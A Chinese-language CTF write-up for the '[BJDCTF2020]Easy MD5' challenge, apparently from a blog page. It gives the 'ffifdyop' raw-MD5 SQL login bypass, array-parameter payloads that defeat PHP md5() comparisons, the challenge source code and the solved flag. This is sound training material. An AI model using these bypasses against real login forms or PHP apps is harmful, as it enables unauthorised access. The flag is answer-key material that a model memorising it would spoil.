0
点赞
收藏
分享

微信扫一扫

[BJDCTF2020]Easy MD5

兽怪海北 2022-03-20 阅读 33

3X02题目-[BJDCTF2020]Easy MD5

ffifdyop

存在MD5密码登录绕过的,ffifdyop万能密码
存在MD5弱类型比较的,可以用数组或者md5碰撞

在这里插入图片描述

之后转到levels91.php

查看源码发现一段php代码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

存在MD5弱类型比较的,可以用数组或者md5碰撞

这里构造payload:./levels91.php?a[]=1&a[]=2

转到levell.php

并得到php代码

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

接着post:param1[]=1&param2[]=2

得到flag

flag{ab7744f3-727a-496a-b62c-0487617a48a0}

举报

相关推荐

[BJDCTF 2020]easy_md5

BJDctf2020 Ezphp

[BJDCTF2020]EzPHP

buu-[BJDCTF2020]JustRE

[BJDCTF2020]纳尼1

0 条评论